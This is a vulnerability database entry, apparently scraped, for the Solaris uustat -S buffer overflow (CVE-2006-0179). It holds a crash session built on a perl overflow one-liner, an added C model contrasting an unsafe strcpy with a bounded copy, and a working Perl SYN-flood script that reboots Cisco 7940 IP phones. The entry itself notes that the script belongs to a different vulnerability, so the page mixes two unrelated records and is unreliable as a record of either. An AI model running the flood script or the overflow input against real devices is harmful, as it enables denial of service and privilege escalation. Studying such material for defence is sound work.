Sun Solaris uustat -S Command-Line Argument Overflow Vulnerability

Vulnerability ID: 1109621    Type: Buffer overflow
Published: 2006-01-10    Updated: 2007-03-30
CVE: CVE-2006-0179    CNNVD ID: CNNVD-200601-107
Platform: Hardware    CVSS score: 5.0
|Vulnerability source
https://www.exploit-db.com/exploits/1411
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200601-107
|Vulnerability details
Solaris is a commercial UNIX operating system developed and maintained by Sun. The /usr/bin/uustat binary on Solaris contains a buffer overflow. The binary is setuid uucp (see the ls -l output below), so an attacker who exploits the overflow gains full control of the return address of the function being executed and can run arbitrary code with the privileges of the uucp user. Passing a string of 1152 bytes or more after the "-S" command-line argument is enough to crash the binary. The session below shows the buffer being overflowed: the o1 register is completely overwritten with the letter A (0x41):

bash-2.03% ls -l /usr/bin/uustat
---s--x--x   1 uucp     uucp       62012 Jan 17 16:07 uustat
bash-2.03$ /usr/bin/uustat -S `perl -e 'print "A"x3000'`
Segmentation Fault
bash-2.03$
(gdb) info registers
g0             0x0              0
g1             0xff315e98       -13541736
g2             0x1cc00          117760
g3             0x440            1088
g4             0x0              0
g5             0x0              0
g6             0x0              0
g7             0x0              0
o0             0xff3276a8       -13470040
o1             0x41414141       1094795585
...
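The bug class above, as an added C example written for this entry (it is a model of the pattern, not uustat's source, which is not on this page): an option argument is copied into a fixed stack buffer with no length check, beside the hardened form that measures with a bound and refuses anything that does not fit. The buffer size SYSNAME_MAX, the function names and the uustat-style argv walk are assumptions; the size is chosen only so that the rejection threshold matches the 1152-byte figure from the advisory.

```c
#define _POSIX_C_SOURCE 200809L
#include <errno.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Assumed buffer size (not from uustat): the advisory only says that a "-S"
 * argument of 1152 bytes or more crashes the real binary, so the model uses
 * that as the point where a bounded copy must refuse the input. */
#define SYSNAME_MAX 1152

/* Vulnerable pattern (model of the bug, not uustat's code): the argument is
 * copied into a fixed-size buffer with no length check. Anything of
 * SYSNAME_MAX bytes or more runs past the buffer into the adjacent stack
 * frame, where saved registers, including the return address, live. */
int set_system_unsafe(char out[SYSNAME_MAX], const char *arg)
{
    strcpy(out, arg);            /* overflows when strlen(arg) >= SYSNAME_MAX */
    return 0;
}

/* Hardened form: measure with a bound first and refuse anything that would not
 * fit together with its terminator; errno lets the caller report the reason. */
int set_system_safe(char out[SYSNAME_MAX], const char *arg)
{
    size_t n = strnlen(arg, SYSNAME_MAX);
    if (n >= SYSNAME_MAX) {
        errno = E2BIG;
        return -1;
    }
    memcpy(out, arg, n + 1);     /* copies the NUL as well; n + 1 <= SYSNAME_MAX */
    return 0;
}

/* Minimal uustat-style option walk for "-S <system>" (assumed shape).
 * Returns 0 on success, -1 with errno set when the value is missing or
 * oversized. Only the safe copy is wired in; the unsafe one stays above
 * purely for contrast. */
int parse_system_arg(int argc, char **argv, char out[SYSNAME_MAX])
{
    for (int i = 1; i < argc; i++) {
        if (strcmp(argv[i], "-S") == 0) {
            if (i + 1 >= argc) {
                errno = EINVAL;
                return -1;
            }
            return set_system_safe(out, argv[i + 1]);
        }
    }
    errno = EINVAL;
    return -1;
}

/* Build the kind of argument the advisory's PoC uses: len bytes of 'A' (0x41),
 * the value that showed up in %o1 as 0x41414141. The caller frees the result. */
char *make_fill(size_t len)
{
    char *p = malloc(len + 1);
    if (!p)
        return NULL;
    memset(p, 'A', len);
    p[len] = '\0';
    return p;
}

int main(void)
{
    char sysname[SYSNAME_MAX];
    char *big = make_fill(3000);                 /* same length as the PoC above */
    char *argv_bad[] = { "uustat", "-S", big, NULL };
    char *argv_ok[]  = { "uustat", "-S", "remotehost", NULL };

    if (parse_system_arg(3, argv_bad, sysname) < 0)
        printf("3000-byte -S argument rejected: %s\n", strerror(errno));
    if (parse_system_arg(3, argv_ok, sysname) == 0)
        printf("accepted system name: %s\n", sysname);

    free(big);
    return 0;
}
```

The point of the boundary is that a bounded copy alone is not enough: strncpy-style truncation would silently accept the 3000-byte argument with a possibly unterminated buffer, whereas measuring with strnlen and returning an error keeps the setuid binary from ever touching more than it allocated.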
|Exploit

Note: the script carried in this entry is kokanin's SYN-flood denial-of-service PoC against Cisco 7940 IP phones, which is what the references below (BID 16200, Cisco's 2006-01-13 response, X-Force cisco-ipphone-synflood-dos) describe; it is not an exploit for the Solaris uustat overflow described above.
#!/usr/bin/perl
# This is made for trashing cisco 7940 ip phones. kokanin made/discovered this.
# A packetcount of 1000 and a packetdelay of 0.002 sent to port 80 makes my
# phone reboot - play with the settings and stuff. PRIVATE PRIVATE PRIVATE!!!
# not private anymore. Vulnerable phones are running ver. 7.0(2.0) using the skinny
# protocol - this is not for the SIP firmware.

use strict;
use warnings;
use Net::RawIP;      # raw IP/TCP packet construction; needs root for the raw socket
use Time::HiRes;     # sub-second sleep between packets

# Usage: <src> <dst> <target port> <number of pkts> <packet delay in seconds>
# (checks the argument count rather than the delay value, so a delay of 0 is allowed)
die "Usage $0 <src> <dst> <target port> <number of pkts> <packet delay>\n" unless (@ARGV == 5);
my ($src, $dst, $port, $count, $delay) = @ARGV;

# One TCP SYN with an attacker-chosen (spoofable) source address; seq/ack zero.
my $pkt = Net::RawIP->new;
$pkt->set({
        ip => {
                saddr => $src,
                daddr => $dst
                },
        tcp=> { dest => $port,
                syn => 1,
                seq => 0,
                ack => 0}
        });

# Send $count SYNs, each from a random source port, pausing $delay seconds
# between them; the phone's TCP stack cannot keep up and the device reboots.
for (1..$count) {
        $pkt->set({ tcp => { source => int(rand(65535)) } });
        Time::HiRes::sleep($delay);
        $pkt->send;
}

# milw0rm.com [2006-01-10]
|References

Source: VUPEN
Name: ADV-2006-0202
Link: http://www.frsirt.com/english/advisories/2006/0202
Source: SECTRACK
Name: 1015488
Link: http://securitytracker.com/id?1015488
Source: SECUNIA
Name: 18479
Link: http://secunia.com/advisories/18479
Source: XF
Name: cisco-ipphone-synflood-dos(24117)
Link: http://xforce.iss.net/xforce/xfdb/24117
Source: BID
Name: 16200
Link: http://www.securityfocus.com/bid/16200
Source: OSVDB
Name: 22469
Link: http://www.osvdb.org/22469
Source: CISCO
Name: 20060113 Response to Cisco IP Phone 7940 DoS Exploit posted on milw0rm.com
Link: http://www.cisco.com/warp/public/707/cisco-response-20060113-ip-phones.shtml
Source: MISC
Link: http://downloads.securityfocus.com/vulnerabilities/exploits/cisco_ip7940_dos.pl